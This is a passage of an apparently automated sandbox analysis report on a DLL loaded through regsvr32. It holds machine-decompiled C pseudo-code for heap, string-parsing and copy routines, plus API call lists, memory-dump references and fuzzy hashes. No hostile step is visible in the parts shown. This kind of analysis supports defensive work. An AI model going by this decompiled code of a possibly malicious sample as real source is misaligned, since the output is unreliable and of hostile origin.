                  				_t29 =  &_a8; // 0xa2
                  				_v112 = _t29;
                  				_t31 =  &_v104; // 0x32
                  				_v120 = _t31;
                  				_t73 = E0000000118000970C(_t54, _t110, _t24, _t150, _t132, _t15, _t14, _t148);
                  				HeapFree(_t128, _t131, _t135);
                  				if (r13d == 0) goto 0x80007eef;
                  				if (_t73 == 0) goto 0x80007ee4;
                  				if (_t73 != 0x10d2) goto 0x80007eef;
                  				E000000011800023B8(r13d, _t110, _t129, _t132, _t135);
                  				if (_t73 != 0) goto 0x80007fff;
                  				_t74 = _a8;
                  				_t151 = _v104;
                  				r13d =  *(_t129 + 0x4c);
                  				_t63 = E00000001180008C48(_t74, _t151);
                  				_t36 =  &_a8; // 0xa2
                  				r9d = 1;
                  				 *(_t129 + 0x48) = _t74;
                  				 *(_t129 + 0x4c) = _t63;
                  				_t64 = E000000011800099F4(_t76, _t110, _t129, _t151, _t132, _t135, _t36, _t147, _t148);
                  				_t75 = _t64;
                  				if (_t64 != 0) goto 0x80007fef;
                  				 *_a16 = _t151;
                  				 *_a24 = _a8;
                  				if ( *(_t129 + 0x4c) != r13d) goto 0x80007f62;
                  				r14d = 1;
                  				if ( *((intOrPtr*)(_t129 + 0x60)) == 0) goto 0x80007fb5;
                  				GetSystemTimeAsFileTime(_t110);
                  				if (r14d == 0) goto 0x80007fa2;
                  				_t107 =  *((intOrPtr*)(_t129 + 0x58));
                  				if (_v80 - _t107 <= 0) goto 0x80007fa2;
                  				_t47 = _t129 + 0xb0; // 0xb0
                  				if (E000000011800045E8(_t75, _t107, _t110, _t47, _t132, _t135) != 0) goto 0x80007fa2;
                  				asm("lock or dword [edi+0xdc], 0x1");
                  				 *((long long*)(_t129 + 0x58)) = _t107 * 0x23c34600 + _v80;
                  				if (_v96 == 0) goto 0x80007fdc;
                  				HeapFree(??, ??, ??);
                  				if (_t75 == 0) goto 0x80007fd4;
                  				if (_t75 != 0x10d2) goto 0x80007fdc;
                  				E00000001180008BC4(_t110, _t129, _v96);
                  				return _t75;
                  			}





































                  0x180007dbc
                  0x180007dbf
                  0x180007dc3
                  0x180007dde
                  0x180007df5
                  0x180007df8
                  0x180007dfc
                  0x180007dff
                  0x180007e0a
                  0x180007e0e
                  0x180007e0e
                  0x180007e12
                  0x180007e17
                  0x180007e19
                  0x180007e1e
                  0x180007e24
                  0x180007e2c
                  0x180007e40
                  0x180007e46
                  0x180007e4e
                  0x180007e51
                  0x180007e54
                  0x180007e5c
                  0x180007e5e
                  0x180007e65
                  0x180007e6e
                  0x180007e73
                  0x180007e78
                  0x180007e81
                  0x180007e88
                  0x180007e93
                  0x180007e9a
                  0x180007ea2
                  0x180007ea7
                  0x180007eaf
                  0x180007eb4
                  0x180007eb9
                  0x180007ecb
                  0x180007ecd
                  0x180007ed6
                  0x180007eda
                  0x180007ee2
                  0x180007eea
                  0x180007ef1
                  0x180007ef7
                  0x180007efe
                  0x180007f03
                  0x180007f0c
                  0x180007f11
                  0x180007f19
                  0x180007f25
                  0x180007f28
                  0x180007f2b
                  0x180007f30
                  0x180007f34
                  0x180007f4a
                  0x180007f54
                  0x180007f5a
                  0x180007f5c
                  0x180007f66
                  0x180007f6d
                  0x180007f76
                  0x180007f78
                  0x180007f81
                  0x180007f83
                  0x180007f93
                  0x180007f95
                  0x180007fb1
                  0x180007fb8
                  0x180007fc2
                  0x180007fca
                  0x180007fd2
                  0x180007fd7
                  0x180007fee

                  APIs
                    • Part of subcall function 0000000180001CB0: EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001CF3
                    • Part of subcall function 0000000180001CB0: HeapAlloc.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D1C
                    • Part of subcall function 0000000180001CB0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,0000000180007E08), ref: 0000000180001D77
                  • HeapFree.KERNEL32 ref: 0000000180007ECD
                  • GetSystemTimeAsFileTime.KERNEL32 ref: 0000000180007F6D
                  • HeapFree.KERNEL32 ref: 0000000180007FC2
                  • HeapFree.KERNEL32 ref: 0000000180007FF7
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heap$Free$CriticalSectionTime$AllocEnterFileLeaveSystem
                  • String ID:
                  • API String ID: 2852518528-0
                  • Opcode ID: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction ID: c83ac7b05f0747d7815e629ee238b773506a9670dbf62c2a3b753bc37d6ce7c8
                  • Opcode Fuzzy Hash: a3f4ae1a574dbd83885b4e74feebd01faf6c5af6d887b4e50d5c00d782bfa35d
                  • Instruction Fuzzy Hash: 09619D3270478986E7A6DF26E4447EA73A5F7987C4F408025FE8947755DF38CA59CB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CloseEventFreeHandleHeapSleep
                  • String ID:
                  • API String ID: 1881548302-0
                  • Opcode ID: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction ID: 230f4233468542b45992d4c356fbdc30eed23d9d8894d230ebd5e64d76f07138
                  • Opcode Fuzzy Hash: 7a87654e1c1d56ead822fbb48c45adb1089b141f8d5014ca0f7a12000a4caef3
                  • Instruction Fuzzy Hash: EE011E31301A4886FEDACF52E9507AA7361FB4CFC2F489025FE5A83754EF28DA588710
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 68%
                  			E0000000118000137C(signed int __esi, long long __rbx, long long __rcx, intOrPtr* __rdx, void* __r10) {
                  				void* __rbp;
                  				intOrPtr _t29;
                  				void* _t32;
                  				void* _t38;
                  				void* _t42;
                  				void* _t54;
                  				void* _t55;
                  				intOrPtr _t56;
                  				void* _t60;
                  				void* _t61;
                  				void* _t65;
                  				signed int _t73;
                  				void* _t105;
                  				void* _t113;
                  				intOrPtr _t126;
                  				long long _t130;
                  				char* _t133;
                  				intOrPtr* _t140;
                  				long _t143;
                  				long _t145;
                  				void* _t148;
                  				void* _t150;
                  				void* _t151;
                  				intOrPtr* _t155;
                  				char* _t162;
                  				void* _t164;
                  				void* _t171;
                  				long _t173;
                  				int _t176;
                  				void* _t180;
                  				void* _t182;
                  
                  				_t164 = __r10;
                  				_t140 = __rdx;
                  				_t130 = __rcx;
                  				 *((long long*)(_t150 + 0x10)) = __rbx;
                  				 *((long long*)(_t150 + 8)) = __rcx;
                  				_t151 = _t150 - 0x60;
                  				_t126 =  *0x8000d4a0;
                  				r14d = r8d;
                  				if (r8d == 0) goto 0x8000160a;
                  				_t73 = __esi | 0xffffffff;
                  				r11d = 0;
                  				r10d = 0;
                  				_t29 =  *__rdx;
                  				if (_t29 == 0xd) goto 0x80001419;
                  				if (_t29 == 0xa) goto 0x80001419;
                  				if (0 != 0) goto 0x800013ef;
                  				if (_t29 == 0x20) goto 0x800013f1;
                  				if (_t29 == 9) goto 0x800013f1;
                  				goto 0x800013f1;
                  				if (_t29 != 0x3b) goto 0x800013fd;
                  				if (r11d != 0) goto 0x8000141d;
                  				r11d = 1;
                  				if (_t29 != 0x3d) goto 0x80001407;
                  				if (0 != 0) goto 0x8000141d;
                  				if (_t29 != 0x7c) goto 0x8000141d;
                  				if (r10d != 0) goto 0x8000141d;
                  				if (1 != 0) goto 0x8000141d;
                  				r10d = 1;
                  				goto 0x8000141d;
                  				if (1 != 0) goto 0x80001424;
                  				if (1 != 0) goto 0x800013ce;
                  				if (__rdx == _t143) goto 0x8000160a;
                  				r13d = r13d - r8d;
                  				r13d = r13d - 1;
                  				r14d = r14d + r13d;
                  				r13d = 1;
                  				if (r11d == 1) goto 0x800015fb;
                  				if (1 == 0) goto 0x80001459;
                  				r12d = 1;
                  				_t5 = _t140 - 1; // -1
                  				_t54 = _t5;
                  				goto 0x8000145c;
                  				_t173 = _t143;
                  				if (_t54 == 0) goto 0x80001605;
                  				if (r10d == 0) goto 0x800014db;
                  				_t6 = _t164 - 1; // -1
                  				_t60 = _t6;
                  				if (_t60 == 0) goto 0x800014db;
                  				_t31 =  <  ? _t60 : 0x10;
                  				if (0x10 == 0) goto 0x800014ab;
                  				r9b =  *__rdx;
                  				if (r9b == dil) goto 0x800014ab;
                  				if (r9b == 0x20) goto 0x800014ab;
                  				_t105 = r9b - 9;
                  				if (_t105 == 0) goto 0x800014ab;
                  				 *((intOrPtr*)(_t151 + 0x30 - __rdx + __rdx)) = r9b;
                  				if (_t105 != 0) goto 0x8000148c;
                  				_t61 = _t60 + 1;
                  				_t32 = ( <  ? _t60 : 0x10) - 0x10 + _t73;
                  				 *((intOrPtr*)(_t151 + _t126 + 0x30)) = dil;
                  				_t162 = _t61 + __rdx;
                  				if ( *_t162 == 0x20) goto 0x800014c6;
                  				if ( *_t162 != 9) goto 0x800014cd;
                  				goto 0x800014ba;
                  				r9b =  *((intOrPtr*)(_t151 + 0x30));
                  				_t155 = __rdx + _t126;
                  				_t55 = _t54 - _t61 + 1;
                  				goto 0x800014e3;
                  				r9b = dil;
                  				 *((intOrPtr*)(_t151 + 0x30)) = dil;
                  				_t64 =  <  ? _t55 : 0x10;
                  				r11d = 0x10;
                  				if (0x10 == 0) goto 0x80001524;
                  				_t56 =  *_t155;
                  				if (_t56 == dil) goto 0x80001524;
                  				if (_t56 == 0x20) goto 0x80001524;
                  				if (_t56 == 9) goto 0x80001524;
                  				_t14 = _t130 - 0x61; // -96
                  				_t113 = _t14 - 0x19;
                  				if (_t113 > 0) goto 0x80001518;
                  				 *((char*)(_t151 + 0x48 - _t155 + _t155)) = _t56 + 0xe0;
                  				r11d = r11d + _t73;
                  				if (_t113 != 0) goto 0x800014fc;
                  				_t65 = ( <  ? _t55 : 0x10) - r11d;
                  				 *((intOrPtr*)(_t151 + __rdx + 0x48)) = dil;
                  				if (r9b != dil) goto 0x80001546;
                  				r8d = 0x10;
                  				memcpy(_t182, _t180, _t176);
                  				if (_t173 == _t143) goto 0x80001591;
                  				if (1 <= 0) goto 0x80001568;
                  				if ( *_t173 == 0x20) goto 0x8000155f;
                  				if ( *_t173 != 9) goto 0x80001568;
                  				if (1 - 1 < 0) goto 0x80001551;
                  				if (1 == 1) goto 0x80001593;
                  				_t38 = _t148 - 1;
                  				if (_t38 <= 0) goto 0x8000158c;
                  				_t133 = _t38 + _t173 + 1;
                  				if ( *_t133 == 0x20) goto 0x80001583;
                  				if ( *_t133 != 9) goto 0x8000158c;
                  				if (_t38 + _t73 > 0) goto 0x80001579;
                  				goto 0x80001593;
                  				_t22 = _t148 + 1; // 0x1
                  				r8d = _t22;
                  				HeapAlloc(_t171, _t143, _t145);
                  				if (_t126 == _t143) goto 0x800015f8;
                  				r8d = 0;
                  				memcpy(_t148, ??);
                  				 *((intOrPtr*)(__rbx + _t126)) = dil;
                  				_t42 = E00000001180008C48(0xffffffff, _t151 + 0x48);
                  				r9d = 0;
                  				 *((long long*)(_t151 + 0x20)) = _t151 + 0x30;
                  				E00000001180005748(_t56 + 0xe0, _t42, __rbx,  *((intOrPtr*)(_t151 + 0xa0)), _t173 + 1, _t126);
                  				HeapFree(??, ??, ??);
                  				if (r14d == 0) goto 0x8000160a;
                  				goto 0x800013bb;
                  				return 0xb;
                  			}


































                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x18000137c
                  0x180001381
                  0x180001391
                  0x180001395
                  0x18000139e
                  0x1800013ab
                  0x1800013b8
                  0x1800013c8
                  0x1800013cb
                  0x1800013ce
                  0x1800013d3
                  0x1800013d7
                  0x1800013db
                  0x1800013df
                  0x1800013e3
                  0x1800013ed
                  0x1800013f3
                  0x1800013f8
                  0x1800013fa
                  0x1800013ff
                  0x180001403
                  0x180001409
                  0x18000140e
                  0x180001412
                  0x180001414
                  0x180001417
                  0x18000141b
                  0x180001422
                  0x180001427
                  0x18000142d
                  0x180001430
                  0x180001433
                  0x180001436
                  0x180001440
                  0x180001448
                  0x18000144c
                  0x18000144f
                  0x18000144f
                  0x180001457
                  0x180001459
                  0x18000145e
                  0x180001467
                  0x180001469
                  0x180001469
                  0x18000146f
                  0x18000147b
                  0x180001482
                  0x18000148c
                  0x180001492
                  0x180001498
                  0x18000149a
                  0x18000149e
                  0x1800014a0
                  0x1800014a9
                  0x1800014ab
                  0x1800014ad
                  0x1800014b2
                  0x1800014b7
                  0x1800014be
                  0x1800014c4
                  0x1800014cb
                  0x1800014cd
                  0x1800014d4
                  0x1800014d7
                  0x1800014d9
                  0x1800014db
                  0x1800014de
                  0x1800014ea
                  0x1800014ed
                  0x1800014f2
                  0x1800014fc
                  0x180001502
                  0x180001507
                  0x18000150c
                  0x18000150e
                  0x180001511
                  0x180001513
                  0x180001518
                  0x18000151f
                  0x180001522
                  0x180001524
                  0x180001527
                  0x18000152f
                  0x18000153b
                  0x180001541
                  0x180001549
                  0x18000154f
                  0x180001556
                  0x18000155d
                  0x180001566
                  0x18000156a
                  0x18000156c
                  0x180001574
                  0x180001576
                  0x18000157c
                  0x180001581
                  0x18000158a
                  0x18000158f
                  0x180001593
                  0x180001593
                  0x18000159c
                  0x1800015a8
                  0x1800015aa
                  0x1800015b5
                  0x1800015c2
                  0x1800015c6
                  0x1800015d3
                  0x1800015e0
                  0x1800015e5
                  0x1800015f2
                  0x1800015fe
                  0x180001600
                  0x180001623

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: Heapmemcpy$AllocFree
                  • String ID:
                  • API String ID: 1496448200-0
                  • Opcode ID: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction ID: 12f6b3511e6ab994a39ab68529ae422f0e798305e72f5bbead824a43ac2e6bc8
                  • Opcode Fuzzy Hash: cdd274b2a0972057d5d3fa9f9dc430bb16684e370421a2ed3793fff496384978
                  • Instruction Fuzzy Hash: AE811331704A8CCDFBF7C52998443E97AC2A3DD7C2FA9C121F982076D5ED648B8A8301
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 25%
                  			E00000001180001208(long long __rbx, void* __rcx, void* __rdx, long long __rsi, long long __rbp, long long* __r9, char _a8, long long _a16, long long _a24, long long _a32, intOrPtr* _a40) {
                  				char _v48;
                  				long long _v56;
                  				long long _t43;
                  				long long _t57;
                  				long long _t58;
                  				void* _t68;
                  				long long* _t73;
                  				void* _t75;
                  
                  				_t56 = __rdx;
                  				_a16 = __rbx;
                  				_a24 = __rbp;
                  				_a32 = __rsi;
                  				_t43 =  *0x8000d4a0;
                  				r12d = r8d;
                  				_t75 = __rdx;
                  				if (__rdx == _t57) goto 0x80001304;
                  				if (r8d == 0) goto 0x80001304;
                  				EnterCriticalSection(??);
                  				asm("lock add dword [esi+0x40], 0x1");
                  				LeaveCriticalSection(??);
                  				_t7 =  &_a8; // -110
                  				r8d = 0;
                  				_v48 = 0;
                  				_a8 = 0;
                  				_v56 = _t57;
                  				if (E00000001180009994(r12d, __rdx, __rdx, _t68, _t7) != 0x7a) goto 0x800012fd;
                  				r8d = _a8;
                  				HeapAlloc(??, ??, ??);
                  				_t58 = _t43;
                  				if (_t43 == 0) goto 0x800012f8;
                  				_v48 = 0x10;
                  				_t14 =  &_a8; // -110
                  				_t73 = _t14;
                  				_v56 = __rcx + 0x72;
                  				if (E00000001180009994(r12d, _t75, _t56, _t43, _t73) != 0) goto 0x800012e8;
                  				 *__r9 = _t58;
                  				 *_a40 = _a8;
                  				goto 0x800012fd;
                  				HeapFree(??, ??, ??);
                  				goto 0x800012fd;
                  				asm("lock add dword [esi+0x40], 0xffffffff");
                  				goto 0x80001313;
                  				 *_t73 = _t58;
                  				 *_a40 = 0;
                  				return 0;
                  			}











                  0x180001208
                  0x180001208
                  0x18000120d
                  0x180001212
                  0x180001224
                  0x180001237
                  0x18000123a
                  0x180001243
                  0x18000124c
                  0x180001256
                  0x18000125c
                  0x180001265
                  0x18000126b
                  0x180001270
                  0x180001279
                  0x18000127d
                  0x180001281
                  0x180001290
                  0x180001292
                  0x18000129c
                  0x1800012a2
                  0x1800012a8
                  0x1800012ae
                  0x1800012b6
                  0x1800012b6
                  0x1800012bb
                  0x1800012d2
                  0x1800012e0
                  0x1800012e4
                  0x1800012e6
                  0x1800012f0
                  0x1800012f6
                  0x1800012fd
                  0x180001302
                  0x18000130c
                  0x180001311
                  0x180001331

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalHeapSection$AllocEnterFreeLeave
                  • String ID:
                  • API String ID: 2939682908-0
                  • Opcode ID: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction ID: a0890feeee0316dd0af96136dbcc6cf79a7537e396d31e91aa434a41704444e3
                  • Opcode Fuzzy Hash: 0aae2bb15498bfce2a9550a8a73fe09b0bb207132fae4a23ee3c1e61430e7fbe
                  • Instruction Fuzzy Hash: 6D314232204B88C7D761CB5AE84439AF7A4F79CBD4F548115EE9983B64DF38C64ACB00
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 27%
                  			E000000011800081F0(void* __edx, long long __rbx, signed short* __rcx, long long __rsi, signed int** __r8, intOrPtr* __r9, void* __r11) {
                  				signed int _t21;
                  				signed int _t28;
                  				signed int* _t38;
                  				int _t53;
                  				long long _t58;
                  				void* _t61;
                  				void* _t72;
                  				signed int* _t73;
                  				long _t75;
                  				long _t78;
                  				void* _t81;
                  
                  				 *((long long*)(_t61 + 8)) = __rbx;
                  				 *((long long*)(_t61 + 0x10)) = _t58;
                  				 *((long long*)(_t61 + 0x18)) = __rsi;
                  				_t21 =  *__rcx & 0x0000ffff;
                  				_t38 = __rbx + 4;
                  				r11d = __edx;
                  				r10d = 0x57;
                  				if (__r11 - _t38 <= 0) goto 0x800082e1;
                  				_t28 =  *(__rbx +  &(__rcx[1])) & 0x0000ffff;
                  				if (__r11 -  &(__rcx[2]) < 0) goto 0x800082e1;
                  				if (_t21 == 0) goto 0x800082e1;
                  				if (_t21 - 0x200 > 0) goto 0x800082e1;
                  				if (_t28 == 0) goto 0x800082e1;
                  				if (_t28 - 0x200 > 0) goto 0x800082e1;
                  				r15d = 0x404;
                  				HeapAlloc(_t81, _t78, _t75);
                  				_t73 = _t38;
                  				if (_t38 == 0) goto 0x800082db;
                  				memset(_t72, _t53);
                  				 *_t73 = (_t21 & 0x0000fff0) << 3;
                  				memcpy(??, ??, ??);
                  				memcpy(??, ??, ??);
                  				 *__r8 = _t73;
                  				 *__r9 = r15d;
                  				r10d = 0;
                  				goto 0x800082e1;
                  				r10d = 8;
                  				return r10d;
                  			}














                  0x1800081f0
                  0x1800081f5
                  0x1800081fa
                  0x180008213
                  0x18000821d
                  0x180008221
                  0x18000822a
                  0x180008236
                  0x18000823c
                  0x18000824b
                  0x180008253
                  0x180008260
                  0x180008264
                  0x180008268
                  0x18000826a
                  0x180008278
                  0x18000827e
                  0x180008284
                  0x18000828e
                  0x1800082b0
                  0x1800082b4
                  0x1800082ca
                  0x1800082cf
                  0x1800082d2
                  0x1800082d6
                  0x1800082d9
                  0x1800082db
                  0x180008300

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeapmemset
                  • String ID:
                  • API String ID: 609429373-0
                  • Opcode ID: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction ID: 28a7b8e95bc2ced4d8e1beef03e6e9b8fa3c41881149a4efc87acd56f6b93b28
                  • Opcode Fuzzy Hash: c4fa16f6dc2f2ba848d15b560345700d108723914946eadfda53ccda28d560ab
                  • Instruction Fuzzy Hash: AA21E072204B9881EB95CF57E84039A7690FB89FC4F04C425FE8A17355EE38C759C308
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: memcpy$AllocHeaplstrlen
                  • String ID:
                  • API String ID: 2888080719-0
                  • Opcode ID: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction ID: d7cda782a7b16298d0386595c53ef50d9ac6af49b43f80025cb93dadd90a3a02
                  • Opcode Fuzzy Hash: f13b7d7e3ec6c9150a795e7257fff4343ad218865bc8e256d013ad43eeebd2c8
                  • Instruction Fuzzy Hash: 83219E72300B9891DB56DF17A9813E9B3A1F78CBD4F498521AE490B799DE38C68AC300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CA7
                  • memset.NTDLL(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CC1
                    • Part of subcall function 0000000180002464: LoadLibraryA.KERNELBASE(?,?,?,0000000180008BB4,?,?,00000000,000000018000510D), ref: 0000000180002476
                  • HeapAlloc.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008CED
                  • InitializeCriticalSection.KERNEL32(?,?,?,?,?,0000000180002BEB,?,?,?,?,?,?,00000000,00000000), ref: 0000000180008D3E
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocHeap$CriticalInitializeLibraryLoadSectionmemset
                  • String ID:
                  • API String ID: 2387776105-0
                  • Opcode ID: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction ID: 4870de9647b4eba85a0def977afe88a726f62592237ec59ed4fc2a31fcf765aa
                  • Opcode Fuzzy Hash: 231236229b59fafa602483bc217cbeaa5c95870d5847978078aa8a3bfdab2cdc
                  • Instruction Fuzzy Hash: 80315036200B5896EB56CF12E8143DA77A5F79CBD4F888126EE8D83795EF38D609C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: FreeHeap$ErrorLast
                  • String ID:
                  • API String ID: 2332451156-0
                  • Opcode ID: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction ID: 57d54ecd6ba6b12e4082159e9fbcbac62f64b62c5c275490acec5f9711af8689
                  • Opcode Fuzzy Hash: a786c878c7dbed4c8c276b5234abe64ea54608898cee96c33fecb54f0875128f
                  • Instruction Fuzzy Hash: D5215E72200B8882EB97DB63D5413A973A5EB8DFC4F589115EE4D93799DF38CA89C300
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: CriticalSection$AllocEnterHeapLeavememcpy
                  • String ID:
                  • API String ID: 224082080-0
                  • Opcode ID: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction ID: 6c58b3867655a66680f731ed639b6ca29fd0989e7b58f2a4007a8aeeb493b1ec
                  • Opcode Fuzzy Hash: fae9b1d28c530db2aae286d3ecdb8edc3b69d7174c662bcadd6a252e0811932a
                  • Instruction Fuzzy Hash: 20112672604B5886E751CF02F888B9AB774F398BD5F958012EA9D43B54DF38C68AC740
                  Uniqueness

                  Uniqueness Score: -1.00%

                  APIs
                  Memory Dump Source
                  • Source File: 00000003.00000002.701680832.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                  • Associated: 00000003.00000002.701673704.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701700659.000000018000B000.00000002.00001000.00020000.00000000.sdmpDownload File
                  • Associated: 00000003.00000002.701706401.000000018000E000.00000002.00001000.00020000.00000000.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_3_2_180000000_regsvr32.jbxd
                  Similarity
                  • API ID: AllocHeaplstrlenmemcpymemset
                  • String ID:
                  • API String ID: 422472530-0
                  • Opcode ID: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction ID: bc1187ca6e9429620bd200782e7290a68718eb3a581ccfc4400d3cdfedcb2126
                  • Opcode Fuzzy Hash: 6855a2b0dbb2b49a0b21a1d0e345b578770580c558caf0e88c3664cb39e6b085
                  • Instruction Fuzzy Hash: 49014832214B8886EB45DF26A84039977A2F78CFC0F498121EE5943B15DF38E655C700
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Control-flow Graph

                  • Executed
                  • Not Executed
